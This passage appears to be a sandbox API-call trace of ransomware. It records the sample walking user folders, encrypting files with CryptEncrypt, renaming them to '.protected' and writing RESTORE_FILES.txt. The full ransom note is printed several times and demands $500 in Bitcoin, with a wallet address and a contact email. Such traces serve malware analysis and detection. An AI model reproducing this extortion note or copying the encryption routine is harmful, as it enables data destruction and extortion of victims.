HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*") returned 73 [0089.365] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.365] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.365] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.365] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.365] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.365] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.365] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\.") returned 73 [0089.365] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.365] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.365] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.365] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.365] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.365] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.365] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.365] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\..") returned 74 [0089.365] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.365] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.365] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.365] lstrcmpiW (lpString1="Data1.cab", lpString2="Windows") returned -1 [0089.365] lstrcmpiW (lpString1="Data1.cab", lpString2="Program Files") returned -1 [0089.365] lstrcmpiW (lpString1="Data1.cab", lpString2="Program Files (x86)") returned -1 [0089.365] lstrcmpiW (lpString1="Data1.cab", lpString2="$Recycle.bin") returned 1 [0089.365] lstrcmpiW (lpString1="Data1.cab", lpString2="System Volume Information") returned -1 [0089.365] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned 81 [0089.366] StrStrIW (lpFirst="Data1.cab", lpSrch=".protected") returned 0x0 [0089.366] lstrcmpW (lpString1="Data1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0089.366] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.366] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned 81 [0089.367] StrStrW (lpFirst="Data1.cab", lpSrch=".txt") returned 0x0 [0089.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned 81 [0089.367] StrStrW (lpFirst="Data1.cab", lpSrch=".rar") returned 0x0 [0089.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab") returned 81 [0089.367] StrStrW (lpFirst="Data1.cab", lpSrch=".zip") returned 0x0 [0089.368] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.369] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.369] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.369] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.369] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.379] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.379] CloseHandle (hObject=0x150) returned 1 [0089.379] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.protected") returned 91 [0089.379] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.protected")) returned 1 [0089.380] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.380] lstrcmpiW (lpString1="jre1.7.0_45.msi", lpString2="Windows") returned -1 [0089.380] lstrcmpiW (lpString1="jre1.7.0_45.msi", lpString2="Program Files") returned -1 [0089.380] lstrcmpiW (lpString1="jre1.7.0_45.msi", lpString2="Program Files (x86)") returned -1 [0089.380] lstrcmpiW (lpString1="jre1.7.0_45.msi", lpString2="$Recycle.bin") returned 1 [0089.380] lstrcmpiW (lpString1="jre1.7.0_45.msi", lpString2="System Volume Information") returned -1 [0089.380] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned 87 [0089.380] StrStrIW (lpFirst="jre1.7.0_45.msi", lpSrch=".protected") returned 0x0 [0089.380] lstrcmpW (lpString1="jre1.7.0_45.msi", lpString2="RESTORE_FILES.txt") returned -1 [0089.380] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.380] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.381] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned 87 [0089.381] StrStrW (lpFirst="jre1.7.0_45.msi", lpSrch=".txt") returned 0x0 [0089.381] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned 87 [0089.382] StrStrW (lpFirst="jre1.7.0_45.msi", lpSrch=".rar") returned 0x0 [0089.382] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned 87 [0089.382] StrStrW (lpFirst="jre1.7.0_45.msi", lpSrch=".zip") returned 0x0 [0089.382] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.395] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.395] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.396] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.396] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.403] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.403] CloseHandle (hObject=0x150) returned 1 [0089.403] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.protected") returned 97 [0089.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.protected")) returned 1 [0089.404] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.404] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.404] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\RESTORE_FILES.txt") returned 89 [0089.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.422] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.422] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.423] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.423] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.423] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.423] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.423] CloseHandle (hObject=0x14c) returned 1 [0089.423] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.424] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.424] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\RESTORE_FILES.txt") returned 77 [0089.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.425] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.425] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.426] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.426] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.426] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.426] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.426] CloseHandle (hObject=0xd8) returned 1 [0089.426] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0089.426] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0089.426] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\RESTORE_FILES.txt") returned 72 [0089.426] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.427] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.427] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0089.427] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.427] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0089.427] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.427] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0089.428] CloseHandle (hObject=0xd4) returned 1 [0089.428] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0089.428] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0089.428] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\RESTORE_FILES.txt") returned 68 [0089.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0089.428] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.428] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0089.429] lstrlenA 